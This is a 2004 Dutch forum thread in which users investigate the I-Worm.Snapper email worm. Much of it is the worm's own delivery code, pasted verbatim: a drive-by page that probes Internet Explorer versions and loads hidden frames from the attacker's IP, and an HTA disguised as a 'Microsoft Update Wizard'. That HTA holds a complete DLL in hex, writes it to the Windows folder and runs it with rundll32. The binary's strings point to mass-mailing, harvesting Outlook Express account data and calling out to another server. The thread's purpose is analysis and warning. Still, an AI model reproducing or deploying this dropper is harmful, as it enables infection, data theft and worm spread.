[VirusAlert] I-Worm.Snapper - link naar banner.htm in mail * - Privacy en beveiliging

woensdag 24 maart 2004 11:41

Acties:

Topicstarter

Wij hebben veel last van een virus met alleen Re: als onderwerp.
In de body van de mail staat alleen een hidden IFRAME die naar deze pagina een verbinding legt. Iemand een idee?

http://198.170.245.129/banner.htm__niet klikken

woensdag 24 maart 2004 11:43

Acties:

Verwijderd

Ondersteund jouw mailclient niet het blokkeren van iframes en remote images?

woensdag 24 maart 2004 11:44

Acties:

hendrikjan

VOORMALIG STUNTMAN

dat werkt natuurlijk niet ..zeggen dat je niet mag klikken .. maar goed

ik heb het wel gedaan en ondevind weing tot geen gekke dingen ..

sloeg nergens op

damn ik zag het net te laat .. my bad

[ Voor 41% gewijzigd door hendrikjan op 24-03-2004 11:46 ]

woensdag 24 maart 2004 11:45

Acties:

Li0nHeart

Topicstarter

Ik heb er niet voor niks een __niet achter gezet .. laat dat maar eens weg

woensdag 24 maart 2004 11:47

Acties:

Verwijderd

Offtopic:

code:

1	129.245.170.198.in-addr.arpa domain name pointer www.mistralusa.net.

code:

Domain Name.......... mistralusa.net
  Creation Date........ 2004-03-09
  Registration Date.... 2004-03-09
  Expiry Date.......... 2014-03-09
  Organisation Name.... Mistral int.
  Organisation Address. 254 Ave B
  Organisation Address.
  Organisation Address. Ronkonkoma
  Organisation Address. 11779
  Organisation Address. NY
  Organisation Address. UNITED STATES
 
Admin Name........... Christine Altieri
  Admin Address........ 254 Ave B
  Admin Address........
  Admin Address........ Ronkonkoma
  Admin Address........ 11779
  Admin Address........ NY
  Admin Address........ UNITED STATES
  Admin Email.......... altierijic@yahoo.com
  Admin Phone.......... (631)4207050
  Admin Fax............
 
Tech Name............ Verio Hostmaster
  Tech Address......... 5050 Blue Lake Dr.
  Tech Address.........
  Tech Address......... Boca Raton
  Tech Address......... 33431
  Tech Address......... FL
  Tech Address......... UNITED STATES
  Tech Email........... hostmaster@VERIO-HOSTING.COM
  Tech Phone........... 888-663-6648
  Tech Fax.............
  Name Server.......... ns19a.nameservers.net
  Name Server.......... ns19b.nameservers.net

[ Voor 87% gewijzigd door Verwijderd op 24-03-2004 11:50 ]

woensdag 24 maart 2004 11:49

Acties:

Osiris

Broncode:

code:

HTTP/1.1 200 OK
Date: Wed, 24 Mar 2004 10:47:21 GMT
Server: Rapidsite/Apa/1.3.29 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.16 OpenSSL/0.9.7c
Last-Modified: Thu, 18 Mar 2004 12:14:04 GMT
ETag: "a80837-7ea-4059928c"
Accept-Ranges: bytes
Content-Length: 2026
Connection: close
Content-Type: text/html

<HTML xmlns:IE>
               <TITLE>Browser security test</TITLE>
                                                       <HEAD>
                                                                      <STYLE type='text/css'>
                         IE\:clientCaps {behavior:url(#default#clientcaps)}
                                                                                    </STYLE>

                            <SCRIPT language="JavaScript">

                                                                      function GetVersion(CLSID)
                            {
                                           if (oClientCaps.isComponentInstalled(CLSID,"ComponentID"))
                                       {return oClientCaps.getComponentVersion(CLSID,"ComponentID").split(",");}
                                               else
                                                                     {return Array(0,0,0,0);}
                         }
                                   </SCRIPT>
                                                 </HEAD>
                                                        <BODY>
                                                               [img]'http://198.170.245.129/cgi-local/userstat.cgi'[/img]
                                                              <IE:clientCaps ID="oClientCaps" />
                     <SCRIPT language="JavaScript">
                                                              if (navigator.appName=="Microsoft Internet Explorer")
                                              {
                                                             var IEversion=navigator.appVersion;
                              var IEplatform=navigator.platform;
                                                                              if (IEplatform.search("Win32") != -1)
                                                 {
                                                                   if (IEversion.search("MSIE 5.0") != -1)
                                           {
                                                 document.write('<object data="http://198.170.245.129/cgi-local/htmlhelp.cgi" style="display:none"></object>');
                                                                                                }
                                  if (IEversion.search("MSIE 5.5") != -1)
                                                                                          {
                document.write('<object data="http://198.170.245.129/cgi-local/htmlhelp.cgi" style="display:none"></object>');
                                                               }
                                                                                 if (IEversion.search("MSIE 6.0") != -1)
                                                         {
                                                                              var Version_IE  = GetVersion("{89820200-ECBD-11CF-8B85-00AA005B4383}");
                                                                                         PatchList = clientInformation.appMinorVersion;
                                                                           document.write('<iframe src="http://198.170.245.129/cgi-local/ie.cgi?vers='+Version_IE+PatchList+'"style="display:none"></iframe>');
                                                    document.write('<object data="http://198.170.245.129/cgi-local/htmlhelp.cgi" style="display:none"></object>');

                                                     }
                                                                    }
                                                                                }

                  </SCRIPT>


                                         </BODY>
                                                </HTML>

woensdag 24 maart 2004 11:51

Acties:

hendrikjan

VOORMALIG STUNTMAN

Li0nHeart schreef op 24 maart 2004 @ 11:45:
Ik heb er niet voor niks een __niet achter gezet .. laat dat maar eens weg

ik heb niets te verliezne

Dan komt er in mijn stat bar "browser security check" te staan en vervolgens blijft de pagina leeg. Als ik alleen het IP adres in mijn adres balk intyp .. dan blijf ik een blanco pagina houden die na verloop van tijd naar yahoo.com gaat ..

de code van de pagina is trouwens

code:

1	damn te laat :P

[ Voor 71% gewijzigd door hendrikjan op 24-03-2004 11:51 ]

woensdag 24 maart 2004 11:52

Acties:

Osiris

Die help.cgi is ook lekker overigens:

Windows-Update-Wizzard?

code:

GET /cgi-local/htmlhelp.cgi HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 24 Mar 2004 10:50:59 GMT
Server: Rapidsite/Apa/1.3.29 (Unix) FrontPage/5.0.2.2510 mod_ssl/2.8.16 OpenSSL/0.9.7c
Content-Length: 20927
Connection: close
Content-Type: application/hta

<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
self.MoveTo 6000,6000
Dim IESetup
Dim EnvStrings
WinEnv_Mask="windir="
Dim Exe_Data(136)
Exe_Data(0)="4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000C8000000"
Exe_Data(1)="0E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000"
Exe_Data(2)="71D4F7DB35B5998835B5998835B5998835B599887FB59988C9958B8834B59988BBAA8A8834B599885269636835B5998800000000000000000000000000000000"
Exe_Data(3)="0000000000000000504500004C010500F49159400000000000000000E0000E210B01050C00100000000E00000014000000100000001000000020000000000010"
Exe_Data(4)="00100000000200000400000000000000040000000000000000700000000400000000000002000000000010000010000000001000001000000000000010000000"
Exe_Data(5)="9045000061000000E84000008C000000000000000000000000000000000000000000000000000000006000005802000000000000000000000000000000000000"
Exe_Data(6)="000000000000000000000000000000000000000000000000000000000000000000400000E8000000000000000000000000000000000000000000000000000000"
Exe_Data(7)="2E74657874000000E40F0000001000000010000000040000000000000000000000000000200000602E627373000000008E130000002000000000000000000000"
Exe_Data(8)="000000000000000000000000800000D02E72646174610000F1050000004000000006000000140000000000000000000000000000400000402E64617461000000"
Exe_Data(9)="A80300000050000000040000001A0000000000000000000000000000400000C02E72656C6F630000940200000060000000040000001E00000000000000000000"
Exe_Data(10)="00000000400000420000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(11)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(12)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(13)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(14)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(15)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(16)="558BEC535657837D0C01757CE8830000000BC0757368040100006864210010FF7508E8C10E0000680401000068602000106A00E8B00E000068DF520010686020"
Exe_Data(17)="0010E8BE05000083F801743C833D04200010017433686C3000106801010000E8380F0000E8910E0000A3FA520010E8630E00006A006A0068AC1400106A03E8E3"
Exe_Data(18)="0E0000A3002000105F5E5BB801000000C9C20C00558BEC83C4ECC745F802000000C745F4000000006876330010E8420E000068863300106876330010E8630E00"
Exe_Data(19)="009BD97DEE668165EEFFF3D96DEEDF2D86330010C745F080969800DA75F0C745F080510100DA75F0DB5DFC6A0068D35200106A006A036A0068975100106A0068"
Exe_Data(20)="775200106805000080E86A0E00000BC00F8528010000FF35D35200108F05CB52001068DB520010686C2E001068D75200106A0068B3520010FF35CB520010E841"
Exe_Data(21)="0E00000BC00F85B4000000833DD7520010040F85A7000000A16C2E00103B45FC756768DB520010686C2E001068D75200106A0068BE520010FF35CB520010E801"
Exe_Data(22)="0E00000BC07526833DD752001004751DA16C2E00100BC0740883F802770348EB092BC0C745F4010000008945F86A048D45F8506A046A0068BE520010FF35CB52"
Exe_Data(23)="0010E8C30D0000EB6A6A048D45FC506A046A0068B3520010FF35CB520010E8A70D00006A048D45F8506A046A0068BE520010FF35CB520010E88D0D0000EB346A"
Exe_Data(24)="048D45FC506A046A0068B3520010FF35CB520010E8710D00006A048D45F8506A046A0068BE520010FF35CB520010E8570D0000FF35CB520010E8340D00008B45"
Exe_Data(25)="F4C9C3558BEC686C3000106801010000E8470D00000BC07404C9C21000680C200010E8710D0000681C200010680C200010E8680D00008B351C200010BF202000"
Exe_Data(26)="1033C0FC66ADAA0BC075F9BF602000106A00680401000057E87B0C0000680401000057E8460C000003F8B05CAA680E5000106860200010E87A0C00006A016860"
Exe_Data(27)="2000106864210010E8E50B000083F8010F85CD0100006A0068D35200106A006A066A0068975100106A0068385100106802000080E87F0C00000BC07552FF35D3"
Exe_Data(28)="5200108F05CB5200106A0068D35200106A006A026A0068975100106A006820200010FF35CB520010E84B0C0000FF35D35200108F05CF520010FF35CF520010E8"
Exe_Data(29)="2E0C0000FF35CB520010E8230C000068D35200106A066A0068825100106800000080E8170C00000BC00F85BA000000FF35D35200108F05CB5200106A0068D352"
Exe_Data(30)="00106A006A026A0068975100106A006820200010FF35CB520010E8D90B0000FF35D35200108F05CF520010FF35CB520010E8BC0B0000FF35CF5200108F05CB52"
Exe_Data(31)="00106A0068D35200106A006A026A0068975100106A006888510010FF35CB520010E8920B0000FF35D35200108F05CF5200106860200010E8460B000050686020"
Exe_Data(32)="00106A016A006A00FF35CF520010E8770B0000FF35CF520010E8540B0000FF35CB520010E8490B00006841500010686C230010E8040B00006800020000686C2E"
Exe_Data(33)="00106A066A00E8970A0000686C2E0010686C230010E8DC0A00006867500010686C23001068195000106800500010685B5000106875500010686C240010E8C60A"
Exe_Data(34)="000083C41CE88C08000083F8FF7414686C260010686C240010E8E4010000E878020000E8EE0A0000C9C21000558BEC535657837D08000F821A010000E8390A00"
Exe_Data(35)="002B05FA5200103D881300000F8604010000833D04200010010F84F70000006A006808200010E8A50A00000BC00F84E3000000682D500010686C230010E83A0A"
Exe_Data(36)="00006800020000686C2E00106A066A00E8CD090000686C2E0010686C230010E8120A00006867500010686C23001068195000106800500010685B500010687550"
Exe_Data(37)="0010686C240010E8FC09000083C41C686C260010686C240010E824010000686C260010E8E1000000BE6C260010AD3D55524C3D755068EC5200106868220010E8"
Exe_Data(38)="B8090000566868220010E8A7090000C705FA31001044000000683E32001068FA3100106A006A006A006A006A006A0068682200106A00E809090000C705042000"
Exe_Data(39)="10010000003D57414954750AC7050420001001000000FF7510FF750CFF7508FF3500200010E864090000833D0420001001750BFF3500200010E86E0900005F5E"
Exe_Data(40)="5BC9C20C00558BEC5657FC8B75088B7D0C57E82B0900008BD08BC68B7D0C8BCAF3A68BF0AC0BC974040AC075EC0BC9750D4E8BFE33C0AAB801000000EB05B800"
Exe_Data(41)="0000005F5EC9C20800558BEC8B7508FCAC3C0D75FB817EFF0D0A0D0A75F283C60356E8DB080000505056FF7508E8AC080000588B750803F0C70600000000C9C2"
Exe_Data(42)="0400558BEC83C4EC6A006A016A02E83F09000083F8FF747F8945FC6A50E812090000668945EE6800500010E8FE0800000BC0745B8B400C8B008B008945F066C7"
Exe_Data(43)="45EC02006A108D45EC50FF75FCE8D608000085C07539FF7508E8640800006A0050FF7508FF75FCE8DA08000083F8FF741E8B750C6A00680002000056FF75FCE8"
Exe_Data(44)="B608000083F8FF740603F00BC075E5FF75FCE88B080000C9C20800558BEC81C40CFDFFFF680E53001068FE520010E89D07000068D352001068190002006A0068"
Exe_Data(45)="985100106802000080E8300800000BC07552FF35D35200108F05CB520010C705DB5200100002000068DB520010686C2E001068D75200106A0068C8510010FF35"
Exe_Data(46)="CB520010E8FB070000A16C2E001025FFFFFF0089853CFEFFFFFF35CB520010E8CE07000068D352001068190002006A0068D05100106801000080E8BF0700000B"
Exe_Data(47)="C07573FF35D35200108F05CB52001068D0510010686C2E0010E85E07000068FC510010686C2E0010E849070000686C2E0010E84B070000C705DB520010000200"
Exe_Data(48)="002905DB520010BE6C2E001003F068DB5200105668D75200106A006807520010FF35CB520010E859070000FF35CB520010E83C07000068D35200106819000200"
Exe_Data(49)="6A00686C2E00106801000080E82D0700000BC00F85C8000000FF35D35200108F05CB520010C705DB5200100002000068DB520010686C2E001068D75200106A00"
Exe_Data(50)="681C520010FF35CB520010E8F4060000686C2E00108D45C050E89E060000C705DB5200100002000068DB520010686C2E001068D75200106A00683B520010FF35"
Exe_Data(51)="CB520010E8BB060000686C2E00108D8540FFFFFF50E862060000C705DB5200100002000068DB520010686C2E001068D75200106A006828520010FF35CB520010"
Exe_Data(52)="E87F060000686C2E00108D85C0FEFFFF50E826060000FF35CB520010E85106000068D352001068190002006A00684D5200106801000080E8420600000BC07542"
Exe_Data(53)="FF35D35200108F05CB520010C705DB5200100401000068DB520010686421001068D75200106A006897510010FF35CB520010E80D060000FF35CB520010E8F005"
Exe_Data(54)="00006864210010E85005000083F8FF7502C9C36A00506A036A006A0168000000806864210010E80D05000083F8FF7502C9C3898530FEFFFF6A006A006A006A02"
Exe_Data(55)="6A00FFB530FEFFFFE8F104000089852CFEFFFF6A006A006A006A04FFB52CFEFFFFE81A050000898528FEFFFF9683C660AD038528FEFFFF898534FEFFFFAD8985"
Exe_Data(56)="38FEFFFFEB378BB534FEFFFF8DBD40FEFFFF2BC0FC81BD3CFEFFFF352C30007503ACEB0266ADAA0BC075EAE839000000838534FEFFFF44FF8D38FEFFFF83BD38"
Exe_Data(57)="FEFFFF0075C0FFB530FEFFFFE85B040000FFB528FEFFFFE8CE040000FFB52CFEFFFFE845040000C9C36A006A016A02E85E05000083F8FF7506B8FFFFFFFFC389"
Exe_Data(58)="8524FEFFFF6A19E82805000066898516FEFFFF8D45C050E8120500000BC00F84AB0100008B400C8B008B00898518FEFFFF66C78514FEFFFF02006A108D8514FE"
Exe_Data(59)="FFFF50FFB524FEFFFFE8DA04000085C00F8579010000C7850CFDFFFF60EA00006A048D850CFDFFFF50680610000068FFFF0000FFB524FEFFFFE8CE040000E8A9"
Exe_Data(60)="01000085C00F8544010000BE6C2A00106A0A6A0D68FE520010681A530010684A53001056E81F04000083C418E82F01000085C00F8516010000BE6C2A00106A0A"
Exe_Data(61)="6A0D8D85C0FEFFFF506820530010685353001056E8EF03000083C418E8FF00000085C00F85E6000000BE6C2A00106A0A6A0D8D8540FEFFFF50682C5300106853"
Exe_Data(62)="53001056E8BF03000083C418E8CF00000085C00F85B6000000BE6C2A0010683653001056E893030000E8B200000085C00F8599000000BE6C2A00106A0A6A0D8D"
Exe_Data(63)="85C0FEFFFF508D8540FFFFFF50686C530010685E53001056E86B03000083C41C56E85C03000003F06A0A6A0D8D8540FEFFFF506873530010685353001056E845"
Exe_Data(64)="03000083C418688150001056E825030000683D53001056E81A030000E83F00000085C0752ABE6C2A0010684353001056E807030000E82600000085C07511FFB5"
Exe_Data(65)="24FEFFFFE859030000B800000000C3FFB524FEFFFFE848030000B8FFFFFFFFC3C78510FDFFFF010000008B8524FEFFFF898514FDFFFF68125300106A006A008D"
Exe_Data(66)="8510FDFFFF506A10E83303000083F8FF747E56E8AA0200006A005056FFB524FEFFFFE81F03000083F8FF7464C78510FDFFFF010000008B8524FEFFFF898514FD"
Exe_Data(67)="FFFF68125300106A006A008D8510FDFFFF506A10E8E702000083F8FF74326A006800010000686C2A0010FFB524FEFFFFE8C502000083F8FF7416BE6C2A0010AC"
Exe_Data(68)="3C3274063C337402EB06B800000000C3B8FFFFFFFFC3558BEC83C4B0C745F4000000006A006A02E89E0100008945FCC7054E32001028010000684E320010FF75"
Exe_Data(69)="FCE8C6010000BE78530010B80D0000008945B0E8C500000085C0747ABE85530010B80A0000008945B0E8AF00000085C07464BE8F530010B80C0000008945B0E8"
Exe_Data(70)="9900000085C0744EBE9B530010B80D0000008945B0E88300000085C07438C7054E32001028010000684E320010FF75FCE85D01000083F801748CFF75FCE8EA00"
Exe_Data(71)="0000837DF4007507B800000000EB05B8FFFFFFFFC9C38B3556320010566A006800001000E81D010000FF45F40BC0742B8945F856687D1E0010E85601000068D0"
Exe_Data(72)="070000FF75F8E82501000083F8FF7403FF4DF4FF75F8E891000000EB81568D7DB48B4DB0FCF3A44F8D357232001056E80E01000003F08B4DB0FDF3A6FC5E7437"
Exe_Data(73)="8D7DB4EB10AC3C6076042C20EB063C4076020420AA0AC075EC4F8D357232001056E8DC00000003F08B4DB0FDF3A6FC7406B8FFFFFFFFC3B800000000C3558BEC"
Exe_Data(74)="83C4FC8D45FC50FF7508E8CB0000008B450C3B45FC750E6A006A006A10FF7508E8BB0000008B4508C9C20800FF257C400010FF2578400010FF2574400010FF25"
Exe_Data(75)="70400010FF256C400010FF253C400010FF2518400010FF251C400010FF2520400010FF2524400010FF2528400010FF252C400010FF2530400010FF2534400010"
Exe_Data(76)="FF2538400010FF2540400010FF2544400010FF2548400010FF254C400010FF2550400010FF2554400010FF2558400010FF255C400010FF2560400010FF256440"
Exe_Data(77)="0010FF2568400010FF259C400010FF2598400010FF2594400010FF2590400010FF258C400010FF2588400010FF2584400010FF2500400010FF2510400010FF25"
Exe_Data(78)="04400010FF2508400010FF250C400010FF25A4400010FF25AC400010FF25B0400010FF25B4400010FF25B8400010FF25BC400010FF25C0400010FF25C4400010"
Exe_Data(79)="FF25C8400010FF25CC400010FF25D0400010FF25D4400010FF25E0400010FF25DC40001000000000000000000000000000000000000000000000000000000000"
Exe_Data(80)="C6440000E6440000F64400000A450000D444000000000000C8420000DC420000F2420000084300001A43000030430000464300005643000066430000AC420000"
Exe_Data(81)="764300008443000096430000A6430000B6430000C6430000DE430000F043000006440000124400001E4400009A42000084420000764200006A4200005C420000"
Exe_Data(82)="00000000A4440000904400008044000064440000564400004444000038440000000000002A450000000000007400008073000080030000800400008034000080"
Exe_Data(83)="090000801000008012000080130000801500008017000080000000006E4500005E450000000000008C41000000000000000000002A44000018400000F8410000"
Exe_Data(84)="0000000000000000BA440000844000007441000000000000000000001C4500000040000018420000000000000000000046450000A44000002042000000000000"
Exe_Data(85)="0000000052450000AC40000050420000000000000000000080450000DC4000000000000000000000000000000000000000000000C6440000E6440000F6440000"
Exe_Data(86)="0A450000D444000000000000C8420000DC420000F2420000084300001A43000030430000464300005643000066430000AC420000764300008443000096430000"
Exe_Data(87)="A6430000B6430000C6430000DE430000F043000006440000124400001E4400009A42000084420000764200006A4200005C42000000000000A444000090440000"
Exe_Data(88)="8044000064440000564400004444000038440000000000002A450000000000007400008073000080030000800400008034000080090000801000008012000080"
Exe_Data(89)="130000801500008017000080000000006E4500005E450000000000001900436C6F736548616E646C65002600436F707946696C65410032004372656174654669"
Exe_Data(90)="6C654100330043726561746546696C654D617070696E67410000420043726561746550726F636573734100004900437265617465546F6F6C68656C703332536E"
Exe_Data(91)="617073686F740000BA00476574436F6D70757465724E616D65410000E60047657443757272656E7454687265616449640000F90047657446696C654174747269"
Exe_Data(92)="627574657341000007014765744C6F63616C65496E666F4100000F014765744D6F64756C6546696C654E616D65410000440147657453797374656D4469726563"
Exe_Data(93)="746F72794100480147657453797374656D54696D650058014765745469636B436F756E740000BD014D6170566965774F6646696C6500D6014F70656E50726F63"
Exe_Data(94)="65737300E30150726F63657373333246697273740000E50150726F6365737333324E65787400100252746C46696C6C4D656D6F727900110252746C4D6F76654D"
Exe_Data(95)="656D6F727900780253797374656D54696D65546F46696C6554696D6500008B02556E6D6170566965774F6646696C6500A80257616974466F7253696E676C654F"
Exe_Data(96)="626A65637400D3026C737472636174410000DC026C737472637079410000E2026C7374726C656E4100004B45524E454C33322E646C6C0000A50277737072696E"
Exe_Data(97)="74664100140043616C6C4E657874486F6F6B45780000CF00456E756D57696E646F7773005F0147657457696E646F7754687265616450726F6365737349640000"
Exe_Data(98)="DB01506F73744D6573736167654100005D0253657457696E646F7773486F6F6B457841008102556E686F6F6B57696E646F7773486F6F6B457800555345523332"
Exe_Data(99)="2E646C6C00004501526567436C6F73654B65790049015265674372656174654B6579457841005C015265674F70656E4B65794578410065015265675175657279"
Exe_Data(100)="56616C75654578410000700152656753657456616C7565457841000041445641504933322E646C6C00006600496E7465726E6574476574436F6E6E6563746564"
Exe_Data(101)="53746174650057494E494E45542E646C6C005753325F33322E646C6C00000C00436F4372656174654775696400000801537472696E6746726F6D434C53494400"
Exe_Data(102)="6F6C6533322E646C6C0000000000000000000000F491594000000000CC450000010000000200000002000000B8450000C0450000C845000043120000AC140000"
Exe_Data(103)="D7450000E24500000000010069656C6F61642E646C6C00496E7374616C6C444C4C004D65737361676548616E646C657200000000000000000000000000000000"
Exe_Data(104)="36362E35352E3134302E3132310049454C4F41442E444C4C002F6367692D62696E2F69656C6F61642E63676900616374696F6E3D55524C26636F756E7472793D"
Exe_Data(105)="00616374696F6E3D696E7374616C6C656426636F756E7472793D0047455420687474703A2F2F0020485454502F312E300D0A0D0A002573257325733F25732573"
Exe_Data(106)="005375626A6563743A2052653A0D0A4D494D452D56657273696F6E3A20312E300D0A436F6E74656E742D547970653A20746578742F68746D6C3B206368617273"
Exe_Data(107)="65743D75732D61736369690D0A0D0A3C48544D4C3E3C424F44593E3C494652414D45207372633D27687474703A2F2F3139382E3137302E3234352E3132392F62"
Exe_Data(108)="616E6E65722E68746D27207374796C653D27646973706C61793A6E6F6E65273E3C2F494652414D453E3C2F48544D4C3E3C2F424F44593E00536F667477617265"
Exe_Data(109)="5C4D6963726F736F66745C57696E646F77735C43757272656E7456657273696F6E5C4578706C6F7265725C42726F777365722048656C706572204F626A656374"
Exe_Data(110)="7300434C53494400496E70726F6353657276657233320000536F6674776172655C4D6963726F736F66745C4F75746C6F6F6B20457870726573735C5665727369"
Exe_Data(111)="6F6E20496E666F0043757272656E7400536F6674776172655C4D6963726F736F66745C496E7465726E6574204163636F756E74204D616E61676572005C416363"
Exe_Data(112)="6F756E74735C0044656661756C74204D61696C204163636F756E7400534D54502053657276657200534D545020456D61696C204164647265737300534D545020"
Exe_Data(113)="446973706C6179204E616D6500536F6674776172655C4D6963726F736F66745C5741425C574142345C5761622046696C65204E616D6500536F6674776172655C"
Exe_Data(114)="4D6963726F736F66745C77696E646F77735C43757272656E7456657273696F6E5C496E7465726E65742053657474696E67730054696D65725469636B7300506F"
Exe_Data(115)="707570734C6F6164656400000000000000000000000000000000000002000052554E444C4C33322E45584500696578706C6F72652E6578652000000000000000"
Exe_Data(116)="00000000000000000000000000001000000000000000400D030048454C4F20004D41494C2046524F4D3A20005243505420544F3A2000444154410D0A000D0A2E"
Exe_Data(117)="0D0A00515549540D0A0025732573256325630025733C25733E256325630025732573203C25733E256325630046726F6D3A2000546F3A20004E41564150573332"
Exe_Data(118)="2E4558450043434150502E455845004F5554504F53542E455845005350494445524D4C2E45584500000000000000000000000000000000000000000000000000"
Exe_Data(119)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(120)="00100000580200001B302D3039303E304E3056306A3078308430A930B330B830D030EE30F930003118311E31233128312D3134313A314D315931633168316D31"
Exe_Data(121)="74317A3189319131B831BE31D431DA31EE31F4310A32103224322A32353247325E3268326D3278327D328C32AE32B332BF32C432D932E432EB32FF3205330C33"
Exe_Data(122)="17331E3324332F3335333B33463350335933713377337E33893390339633A133A733AD33B833BE33C533D033D733DD33E833EE33F333FE330A34153420342A34"
Exe_Data(123)="2F343E344C3451345B34603465346A346F347434793490349534C334D434E234F434F934083516351B3525352A352F35343539353E354335503555355F356935"
Exe_Data(124)="76357B35863591359A359F35B035BD35CE35E135EC35F535A73625372A373437403754375A37603769376E3773377A3780378A379B37A537B137C537CB37D037"
Exe_Data(125)="D537DF37E437EE37F937033808380F3815381C3822382D38373843385B3861386738703875387A38813887389138A038A938AE38B338BA38C038CA38DC38E538"
Exe_Data(126)="EA38EF38F638FC380639183922392E39423948394E3957395C39613968396E3979398339A2390C3B153B1A3B1F3B3A3B4A3B4F3B6A3B7A3B7F3B9A3B9F3BB73B"
Exe_Data(127)="CE3BD33BF43BF93B073C123C263C2B3C773CC33CE63CFB3C313D3A3D473D5D3D733D893DA03DA93DD83DF53D2A3E5C3EAE3EB43EBA3EC03EC63ECC3ED23ED83E"
Exe_Data(128)="DE3EE43EEA3EF03EF63EFC3E023F083F0E3F143F1A3F203F263F2C3F323F383F3E3F443F4A3F503F563F5C3F623F683F6E3F743F7A3F803F863F8C3F923F983F"
Exe_Data(129)="9E3FA43FAA3FB03FB63FBC3FC23FC83FCE3FD43FDA3FE03F00000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(130)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(131)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(132)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(133)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(134)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
Exe_Data(135)="00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
For Each WinEnv In MSplay.Environment("PROCESS")
If InStr(WinEnv,WinEnv_Mask)<>0 Then
EnvStrings=Split(WinEnv,"=",-1,1)
WinDir=EnvStrings(1)
End If
Next
FileName=WinDir+"\Ieload.dll"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
For j=0 To 135
Exe_Data_Size=Len(Exe_Data(j))
For k=1 To (Exe_Data_Size-1) Step 2
Exe_Byte=Mid(Exe_Data(j),k,2)
Exe_Byte="&H"+Exe_Byte
WriteFile()
Next
Next
IESetup.Close()
RunCommand="Rundll32"+" "+Filename+","+"InstallDLL"
MSplay.Run (RunCommand),1,TRUE
MSmedia.DeleteFile(FileName)
self.Close

Function WriteFile
IESetup.Write(Chr(Exe_Byte))
End Function
</SCRIPT></BODY></HTML>

woensdag 24 maart 2004 11:54

Acties:

Verwijderd

Hu? Een DLL installeren via een webpagina?

woensdag 24 maart 2004 11:54

Acties:

Li0nHeart

Topicstarter

Heh.. lijkt er wel op he.. ff de nieuwste patches van Microsoft installeren.

Bij de gebruiker verschijnt inderdaad een ieload.dll in de system directory.

[ Voor 35% gewijzigd door Li0nHeart op 24-03-2004 11:54 ]

woensdag 24 maart 2004 11:56

Acties:

Verwijderd

/me snapt niet dat mensen uberhaupt niet nog bij Windows WILLEN blijven na het zien van deze simpele exploit

woensdag 24 maart 2004 12:01

Acties:

Verwijderd

Werkt zulks ook bij Mozilla ?

/me =fervente gebruiker van Mozilla, omdat hij toch wel een veiliger gevoel daarvan krijgt. Maar hij hoopt niet dat het een vals gevoel van veiligheid is

woensdag 24 maart 2004 12:02

Acties:

Verwijderd

Verwijderd schreef op 24 maart 2004 @ 12:01:
Werkt zulks ook bij Mozilla ?

/me =fervente gebruiker van Mozilla, omdat hij toch wel een veiliger gevoel daarvan krijgt. Maar hij hoopt niet dat het een vals gevoel van veiligheid is

Op mijn Linux doos met Mozilla Firefox niet

woensdag 24 maart 2004 12:04

Acties:

Osiris

Voor de mensen die niets denken te hebben en alleen een redirect kregen naar Yahoo, check dan je C: ff

Daar staat als 't goed is een nieuwe file netlog.exe

Zie ook http://mailman.anu.edu.au...nk/2004-March/055782.html

woensdag 24 maart 2004 12:05

Acties:

Verwijderd

Verwijderd schreef op 24 maart 2004 @ 12:02:
[...]
Op mijn Linux doos met Mozilla Firefox niet

Maaruh . . . 'k heb (nog) een Windows XP Doos + Mozilla 1.6

woensdag 24 maart 2004 12:08

Acties:

Osiris

htmlhelp.cgi doet overigens hetzelfde als help.cgi

woensdag 24 maart 2004 12:10

Acties:

hendrikjan

VOORMALIG STUNTMAN

Osiris schreef op 24 maart 2004 @ 12:04:
Voor de mensen die niets denken te hebben en alleen een redirect kregen naar Yahoo, check dan je C: ff Daar staat als 't goed is een nieuwe file netlog.exe

Zie ook http://mailman.anu.edu.au...nk/2004-March/055782.html

toch niet met een linux dsitro met mozilla ..

woensdag 24 maart 2004 12:19

Acties:

Osiris

Check het begin van die data-meuk ook eens:

code:

1	Exe_Data(0)="4D5A90000300000004000000FFFF0000B8000

4D5A.. Wat is dat in ASCII? Juist, "MZ". Waar begon een exe ook alweer mee? Juist.. Gewoon een freaking exe-file in HEX in je HTML.. En blijkbaar werkt het ook

Blij dat ik Mozilla gebruik toch wel

[ Voor 5% gewijzigd door Osiris op 24-03-2004 12:20 ]

